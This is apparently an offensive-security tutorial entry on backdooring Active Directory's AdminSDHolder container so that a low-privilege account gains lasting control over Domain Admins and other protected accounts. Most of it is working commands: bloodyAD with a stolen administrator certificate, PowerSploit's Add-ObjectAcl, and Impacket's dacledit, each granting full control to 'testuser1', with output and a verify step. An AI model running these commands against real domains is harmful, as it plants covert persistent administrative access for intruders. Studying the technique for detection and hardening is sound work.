Backdooring AdminSDHolder

AdminSDHolder is a container object in Active Directory that acts a template for the security descriptors applied to high-privilege accounts. Every 60 minutes, the SDProp process updates these accounts to match the permissions defined on AdminSDHolder. This enforces consistent access controls.

AdminSDHolder can be abused to persist privileges or create backdoors by granting low-privilege users control of AdminSDHolder.

Vulnerable certificate templates can be used to take advantage of this. After obtaining the certificate of a privileged user, bloodyAD can assign GenericAll permissions to a low-privilege user.

pipx install bloodyAD

Add testuser1 user to AdminSDHolder:

bloodyAD -c ":administrator.pem" -d domain.com -u administrator --host 192.168.70.2 add genericAll 'CN=AdminSDHolder,CN=System,DC=domain,DC=com' testuser1
Reverse with: remove genericAll

Output:
[+] testuser1 has now GenericAll on CN=AdminSDHolder,CN=System,DC=domain,DC=com

testuser1 now has full control over the AdminSDHolder object.

Without proper monitoring, changes to AdminSDHolder may go unnoticed, potentially leading to undetected privilege escalation. Any accounts protected by AdminSDHolder (e.g., Domain Admins) may be modified or persistently controlled using this foothold.

PowerSploit can also abuse AdminSDHolder:

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName testuser1 -Verbose -Rights All

As well as Impacket's dacledit:

python3 -m pipx install impacket

dacledit.py -action 'write' -rights 'FullControl' -principal 'testuser1' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=COM' domain.com/admin -dc-ip 192.168.70.2

Verify:

dacledit.py -action 'read' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=COM' domain.com/admin